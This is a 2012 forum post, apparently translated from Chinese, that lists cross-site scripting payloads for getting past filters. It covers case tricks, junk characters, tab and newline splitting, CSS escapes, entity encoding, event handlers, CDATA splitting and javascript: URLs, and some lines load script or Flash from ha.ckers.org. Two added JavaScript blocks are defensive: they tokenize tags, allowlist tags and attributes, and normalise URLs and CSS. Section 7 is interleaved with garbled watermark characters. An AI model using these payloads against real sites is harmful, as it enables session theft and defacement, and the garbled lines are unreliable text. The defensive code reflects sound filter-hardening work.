An introduction to Cross Site Scripting (XSS) attack techniques

Posted by the original poster (楼主) on 2012-12-31 09:59:28
1. Change the character case

    <sCript>alert('d')</scRipT>

2. Add extra characters to get past regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use some other extension in place of .js

    <script src="bad.jpg"></script>
4. Put the JavaScript inside a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }
5. Put some other characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> newline

    (the gaps inside "javascript" above are tab or newline characters; the forum rendered them as spaces)
7. 使用"\"来规避  d' d+ E! z& Y; |" Y. Q# u1 S6 v
9 g: |" k2 O1 w" B( y
    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
2 m8 M& [. _, ~2 [. c$ _, e$ k7 E5 ^/ [! g5 x( `2 z
    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
, o" W/ P' x. |1 a: e- U  P- I
! @& h+ s9 r1 ]% l# x    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
1 S$ s1 c4 @* w8 I* H7 E) d3 b8 D, a# k8 H2 {$ n
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">! ]  e; d/ t2 ~" F5 b" A
0 \6 K4 Y: ?3 X" @- i/ `
    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
' X1 _% F- j* c- f* W* m; X8 ^/ x0 R3 x/ r# w
8. Use hex encoding to evade (the ";" can also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        original source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        original source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
' {; I" u5 y, n# o( A7 i9. script in HTML tag
  `5 \9 N, ]' \! y0 o+ a9 N* O4 O# a: X! v
    <body onload=」alert(‘onload’)」>
: b- b: l  s& J  T/ p, r3 f7 T3 O& w" {+ U4 A; i
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
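The tricks in sections 1, 2, 5 and 9 all beat filters that pattern-match the raw text, while the browser tokenizes a start tag by fixed rules: tag and attribute names are ASCII case-folded, a "/" between attributes acts like a space, a leading "=" becomes part of an attribute name, and a ">" inside a quoted attribute value does not close the tag. The following is an added example, not code from the original post: a small start-tag tokenizer that follows those rules, a naive regex filter of the kind the post is evading, and an allowlist decision made on the parsed tag instead of on the text. The `ALLOWED` policy, the function names, and the two inputs marked "constructed" are assumptions for illustration; the remaining inputs are the post's own payloads.

```javascript
// Added example for sections 1, 2, 5 and 9 of the post above (not the post's
// own code). The browser tokenizes a start tag by fixed rules; a filter that
// regexes the raw text uses different rules, and every gap between the two is
// a bypass. ALLOWED, the function names and the two inputs marked
// "constructed" below are assumptions for illustration.

// The kind of filter the post is evading: a case-insensitive "<script>" blocklist.
function naiveRegexFilter(html) {
  return html.replace(/<script>/gi, "");
}

// Minimal start-tag tokenizer following the HTML tokenizer's rules for the
// cases in the post: "<" only opens a tag when an ASCII letter follows, tag and
// attribute names are ASCII case-folded, "/" between attributes acts like a
// space, a leading "=" becomes part of an attribute name, and ">" inside a
// quoted value does not end the tag. Returns {name, attrs} or null.
function tokenizeStartTag(html) {
  let i = -1;
  for (let j = html.indexOf("<"); j !== -1; j = html.indexOf("<", j + 1)) {
    if (/[A-Za-z]/.test(html[j + 1] || "")) { i = j + 1; break; }
  }
  if (i === -1) return null;
  let name = "";
  while (i < html.length && !/[\s\/>]/.test(html[i])) name += html[i++];
  const attrs = {};
  for (;;) {
    while (i < html.length && /[\s\/]/.test(html[i])) i++;   // "/" is only a separator here
    if (i >= html.length) return null;                         // unterminated tag
    if (html[i] === ">") break;
    let attrName = html[i] === "=" ? html[i++] : "";           // spec: "=" starts a name
    while (i < html.length && !/[\s\/>=]/.test(html[i])) attrName += html[i++];
    while (i < html.length && /\s/.test(html[i])) i++;
    let value = "";
    if (html[i] === "=") {
      i++;
      while (i < html.length && /\s/.test(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {
        const end = html.indexOf(q, i + 1);
        if (end === -1) return null;
        value = html.slice(i + 1, end);      // a ">" in here does NOT close the tag
        i = end + 1;
      } else {
        while (i < html.length && !/[\s>]/.test(html[i])) value += html[i++];
      }
    }
    attrs[attrName.toLowerCase()] = value;
  }
  return { name: name.toLowerCase(), attrs };
}

// Allowlist policy (assumed): these tags, these attributes, never an on* handler.
// Because the decision is made on the parsed tag, case and junk characters no
// longer matter: <sCript>, <<script>, <SCRIPT/SRC=...> all arrive as "script".
const ALLOWED = { b: [], i: [], a: ["href"], img: ["src", "alt"], span: [] };

function allowlistVerdict(html) {
  const tag = tokenizeStartTag(html);
  if (!tag) return "no-tag";
  if (!(tag.name in ALLOWED)) return "rejected-tag:" + tag.name;
  for (const attr of Object.keys(tag.attrs)) {
    if (attr.startsWith("on") || !ALLOWED[tag.name].includes(attr)) return "rejected-attr:" + attr;
  }
  return "allowed";
}

// Inputs: the post's payloads, plus two constructed ones (marked).
const PAYLOADS = [
  "<sCript>alert('d')</scRipT>",                    // section 1
  "<<script>alert('c')//<</script>",                // section 2
  '<SCRIPT a=">" SRC="t.js"></SCRIPT>',             // section 2
  '<SCRIPT/SRC="t.js"></SCRIPT>',                   // section 5
  '<SCRIPT/anyword SRC="t.js"></SCRIPT>',           // section 5
  "<body onload=\"alert('onload')\">",              // section 9
  "<IMG SRC=\"x\" onerror=\"alert('XSS')\">",       // constructed from section 9's list
  '<img src="cat.jpg" alt="cat">',                  // constructed benign input
];

// One row per payload: did the regex filter change anything, and what does the
// allowlist decide? Only the first two contain a literal "<script>".
function compare(payloads = PAYLOADS) {
  return payloads.map((p) => ({
    payload: p,
    regexTouched: naiveRegexFilter(p) !== p,
    verdict: allowlistVerdict(p),
  }));
}
```

Run it with `node` and inspect `compare()`: the regex filter only touches the two payloads that literally contain `<script>`, while every script-tag variant reaches the allowlist as tag name `script` and is rejected on that alone, and the `onerror` input is rejected on the attribute. Parsing the section 2 variant `<SCRIPT =">" SRC="t.js">` with these rules yields no `src` at all (the `=` opens an attribute name and the first `>` ends the tag), which shows that that particular payload depended on a parser more lenient than the standard tokenizer.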
10. An swf file containing XSS code

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code apart and reassemble it.

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
    </BODY></HTML>
13. Set a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url()

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
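Sections 6, 7 and 8, and the URL-bearing attributes collected in section 14, all exploit the gap between the text a filter inspects and the value the browser acts on: the URL parser removes tab, LF and CR from its input before it looks for a scheme, attribute values are entity-decoded before they become URLs (and numeric references work without the trailing ";"), and CSS undoes backslash escapes and drops `/* */` comments before it ever matches `expression` or `javascript:`. The following is an added example rather than code from the post: normalise the value the same way the browser does, then check the scheme against an allowlist instead of hunting for the string "javascript". `SAFE_SCHEMES`, `URL_ATTRS` and the function names are assumptions; the inputs are the post's payloads. Note that `expression()`, and a `javascript:` URL in an `img src`, `link href` or CSS `url()`, only ever ran in old Internet Explorer and are ignored by current browsers, whereas `javascript:` in an `iframe src` or a link `href` still runs; the normalisation lesson applies to any filter that inspects attribute text.

```javascript
// Added example for sections 6, 7, 8 and 14 of the post above (not the post's
// own code). Every trick there widens the gap between the text a filter sees
// and the value the browser acts on; the fix is to normalise the same way the
// browser does and then allowlist the scheme. SAFE_SCHEMES, URL_ATTRS and the
// function names are assumptions for illustration.

// Character references in attribute values. Numeric references decode with or
// without the trailing ";" (section 8's note), hex (&#x6A;) or decimal (&#106;).
const NAMED_REFS = { lt: "<", gt: ">", amp: "&", quot: '"', apos: "'" };
function decodeHtmlRefs(s) {
  return s.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);?/g, (match, ref) => {
    if (ref[0] !== "#") return NAMED_REFS[ref] !== undefined ? NAMED_REFS[ref] : match;
    const cp = /^#[xX]/.test(ref) ? parseInt(ref.slice(2), 16) : parseInt(ref.slice(1), 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
  });
}

// The URL parser removes every ASCII tab, LF and CR from its input and trims
// leading/trailing C0 controls and spaces before it looks for "scheme:". So
// "jav<TAB>ascr<LF>ipt:" (section 6) is the javascript scheme.
function urlScheme(rawAttrValue) {
  const s = decodeHtmlRefs(rawAttrValue)
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
  const m = /^([A-Za-z][A-Za-z0-9+.\-]*):/.exec(s);
  return m ? m[1].toLowerCase() : null;   // null = relative URL, no scheme
}

const SAFE_SCHEMES = new Set(["http", "https", "mailto"]);   // assumed policy
function isSafeUrl(rawAttrValue) {
  const scheme = urlScheme(rawAttrValue);
  return scheme === null || SAFE_SCHEMES.has(scheme);   // allowlist, not a "javascript" blocklist
}

// CSS: "/* */" comments vanish between tokens, "\" + 1-6 hex digits (plus one
// optional whitespace) is a code point, and "\" before any other character is
// that character. This undoes expre\ssion, expr/**/ession and \ja\vasc\ript.
function normalizeCss(style) {
  return style
    .replace(/\/\*[\s\S]*?\*\//g, "")
    .replace(/\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\([\s\S])/g, (m, hex, ch) => {
      if (ch !== undefined) return ch;
      const cp = parseInt(hex, 16);
      return cp === 0 || cp > 0x10ffff ? "\uFFFD" : String.fromCodePoint(cp);
    });
}
// Entities are decoded by the HTML tokenizer first, then CSS parses the result.
function cssHasDangerousToken(style) {
  const n = normalizeCss(decodeHtmlRefs(style)).toLowerCase();
  return /expression\s*\(|javascript\s*:|@import/.test(n);
}

// Which attributes are URL contexts (section 14's list) and which are CSS.
const URL_ATTRS = new Set(["src", "href", "dynsrc", "lowsrc", "background", "action", "formaction"]);
function attributeIsSafe(name, value) {
  const n = name.toLowerCase();
  if (n === "style") return !cssHasDangerousToken(value);
  if (URL_ATTRS.has(n)) return isSafeUrl(value);
  return true;   // other contexts (event handlers etc.) are outside this example
}
```

The order of the normalisation steps matters and mirrors the browser: entity decoding first (it is the HTML tokenizer that does it), then the URL parser's whitespace stripping or the CSS escape and comment handling, and only then the decision. Checking for the substring "javascript" on the raw attribute text, which is what the post's payloads defeat, is never reached here.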